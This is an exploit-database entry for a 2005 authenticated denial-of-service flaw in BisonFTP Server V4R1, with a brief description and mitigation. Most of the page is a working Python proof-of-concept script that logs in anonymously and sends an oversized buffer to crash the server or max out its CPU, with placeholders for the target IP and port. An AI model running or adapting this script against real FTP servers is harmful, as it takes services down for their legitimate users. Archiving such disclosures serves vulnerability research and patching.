header-logo
Suggest Exploit
vendor:
BisonFTP Server
by:
fRoGGz - SecuBox Labs
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: BisonFTP Server
Affected Version From: V4R1
Affected Version To: V4R1
Patch Exists: YES
Related CWE: N/A
CPE: a:bisonftp:bisonftp_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2005

BisonFTP Denial of Service Vulnerability

BisonFTP is prone to a remote denial-of-service vulnerability. A remote attacker may exploit this issue to deny service for legitimate users. Reports indicate that the issue may be exploited only after successful authentication. A malicious user can send an invalid buffer size to BisonFTPD, resulting in 100% CPU usage or a crash.

Mitigation:

Ensure that the BisonFTP server is updated to the latest version and that all authentication credentials are secure.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14079/info

BisonFTP is prone to a remote denial-of-service vulnerability. A remote attacker may exploit this issue to deny service for legitimate users.

Reports indicate that the issue may be exploited only after successful authentication. 

#!/usr/bin/python
#
# Vulnerability: Denial Of Service
# Discovered on: June 26, 2005 by fRoGGz - SecuBox Labs
# When an invalid buffer size is sent to BisonFTPD -> DoS (100% CPU usage or crash)
# NB: Sorry for Python purists, it's the first time that i use it ;)

import socket
import time

n = 1
t = 98192 #Try others, it's funny.
p = 21 # Set your port here.
ip = "192.168.0.1" # Set ip here.
boom = "PoC "+'\x41'*t

print "\n\nVulnerable product: BisonFTP Server V4R1"
print "Denial of Service vulnerability"
print "---------------------------------------------"
print "Discovered & coded by fRoGGz - SecuBox Labs\n"

try:

    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    connect=s.connect((ip,p))

    d=s.recv(1024)

    print "[+] " +d

    print "[+] Utilisateur."

    time.sleep(1)

    s.send('USER Anonymous\r\n')

    s.recv(512)

    print "[+] Mot de passe."

    time.sleep(1)

    s.send('PASS Anonymous\r\n')

    s.recv(512)

    print "[+] Envoi malicieux.\n\nDoS termine !\n"

    time.sleep(1)

    s.send(boom+'r\n\n')


except:

    print "[+] Machine indisponible, verifiez le port ou l'ip."

Navigation

Suggest Exploit

Services By CQR